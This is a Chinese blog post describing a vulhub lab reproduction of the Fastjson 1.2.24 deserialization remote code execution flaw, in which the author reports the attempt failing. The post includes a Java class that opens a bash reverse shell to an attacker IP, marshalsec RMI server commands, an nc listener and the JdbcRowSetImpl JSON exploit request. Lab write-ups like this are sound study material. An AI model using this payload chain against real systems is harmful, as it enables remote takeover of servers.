【vulhub漏洞复现】Fastjson 1.2.24反序列化漏洞

已于 2023-03-06 23:01:45 修改
阅读量3.6k 收藏 7
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: 安全 web安全 json java Powered by 金山文档
于 2023-03-06 21:53:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51683653/article/details/129364136
版权

一、漏洞详情

Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。

漏洞成因:
目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。

二、复现过程

  1. 搭建docker环境

docker-compose up -d

bp抓个包,GET改成POST,添加Content-Type字段为application/json,再添加请求参数,可以发现name返回值已经改成了Lili

如果他对于java对象也有回应,那fastjson漏洞不就在眼前了~

  1. 反弹shell

在vulhub下的fastjson 1.2.24文件夹下新建TouchFile.java文件,内容为:(注意修改为自己的攻击机ip)

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
 
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.239.128/2333 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译java文件

把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在的目录,Python起一个http服务

python -m SimpleHTTPServer 4444

使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class

mvn安装参考教程

git clone https://github.com/mbechler/marshalsec (安装marshalsec)
source /etc/profile
cd marshalsec/
mvn clean package -DskipTests

编译成功

进入target目录,可以查看到marshalsec-0.0.3-SNAPSHOT-all.jar

开启RMI服务(marshalsec-master/target 目录下 )

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.239.128:4444/#TouchFile" 9999

另起一个终端开启监听(nc -lvnp 2333)

nc -lvp 2333

在192.168.239.128:8090处用bp抓包,构造如下POST请求包

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 167
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.239.128:9999/TouchFile",
        "autoCommit":true
    }
}

发送,这俩都有反应

按道理来说,应该监听的2333端口也反弹shell了,但我这边一点反应没有,不应该啊!

附一张别人成功的图= =

https://blog.csdn.net/m0_54899775/article/details/122530463

三、总结

今天好像诸事不顺,复现两个漏洞全都卡半路了。

个人觉得上面复现失败可能是因为java 和javac的版本不一致,尝试了几个网上的方法都失败了(环境问题真的是头大,搞一天了),打算快照重开了。

另外发现kali自带的bp在jdk17版本以上貌似用不了,于是乎我又双叒叕下载了jdk1.8,结果也不行,最后下回了jdk11,才能正常打开bp😅

别的没学到,linux命令倒是学了一堆😅

可以切换jdk版本的:

update-alternatives --config java

kali更新为java17的原因找到了(默认是11),因为kali没有javac,所以我在上面编译那个java文件的时候,去执行了 apt install default-jdk 这条命令,而它!就是罪魁祸首!

还有切换javac的命令:

update-alternatives --config javac

虽然java和javac版本一致了,但是2333端口还是出不来ovo

RexHarrr
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
fastjson反序列化-1.2.24漏洞利用与分析
hackzkaq的博客
01-24 971
Fastjson1.2.24版本是最先发现漏洞的版本,这篇文章也是作为学习Fastjson反序列化的开端。后续会继续学习Fastjson高版本的绕过。反序列化之路任重而道远。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
fastjson1.2.24反序列化RCE
最新发布
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 792
fastjsonjava的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
小司机的奥拓
04-23 1651
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2573
vulhub-spring漏洞复现
Fastjson 1.2.24 反序列化漏洞研究
辛勤搬砖的门卫的专栏
01-05 1171
Fastjson 反序列化漏洞
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3047
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1536
vulhub漏洞复现练习篇
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2537
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
Vulhub靶场之Tomcat漏洞复现
weixin_66717977的博客
06-30 433
tomcat漏洞复现
Vulhub漏洞复现
weixin_45995579的博客
09-30 1703
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
Jackson框架出现Java反序列化漏洞 2.7.10 及2.8.9以下版本受影响 绿盟科技发布防护方案...
weixin_33726318的博客
09-01 1814
Jackson可以轻松的将Java对象转换成json对象和xml文档,同样也可以将json、xml转换成Java对象,在2017年3月份,fastjson 1.2.24之前版本曾经出现过严重漏洞。而更早的时候,Java反序列化漏洞问题曾经一度让大家心惊肉跳,这次是Jackson框架 2.7.10 及2.8.9以下版本出现任意代码执行漏洞,攻击者利用该...
记一次vulhub靶场复现Weblogic SSRF漏洞
weixin_53622191的博客
08-11 199
复现的就是这个靶场了,为了弄清一下通过ssrf漏洞来getshell的过程。
vulhub漏洞复现】redis 4-unacc 未授权访问漏洞
m0_59598029的博客
01-31 1040
第一次看使用公私钥ssh免密登录的过程还有计时任务反弹的过程网络安全真是学无止境。
vulhub mq复现
05-01
Vulhub MQ复现主要是通过在Vulhub平台上搭建RabbitMQ服务器,然后模拟实际攻击行为,测试服务器是否存在漏洞,并尝试利用漏洞获取对服务器的控制权限。 首先需要下载并运行Vulhub容器,并在容器中下载安装RabbitMQ服务器。接着可以使用模拟攻击工具,如Metasploit、amqp-bunny等工具,利用已知漏洞或弱点向服务器发起攻击,并收集攻击结果和响应信息。 例如,可以尝试通过未授权访问漏洞,获取到服务器的配置信息和证书文件;或者利用强制广播攻击,将恶意代码注入服务器,获取对服务器的访问权限,并控制服务器进行任意操作。 在进行测试前,需要完善测试计划和检查清单,确认测试环境搭建是否成功,并进行安全性评估和漏洞扫描,避免因测试过程中的错误操作,导致服务器系统瘫痪或泄漏敏感信息,造成不必要的损失。 总之,Vulhub MQ 复现是对RabbitMQ服务器进行安全性测试的重要方法,可有效提升服务器的安全性,保障应用程序正常运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值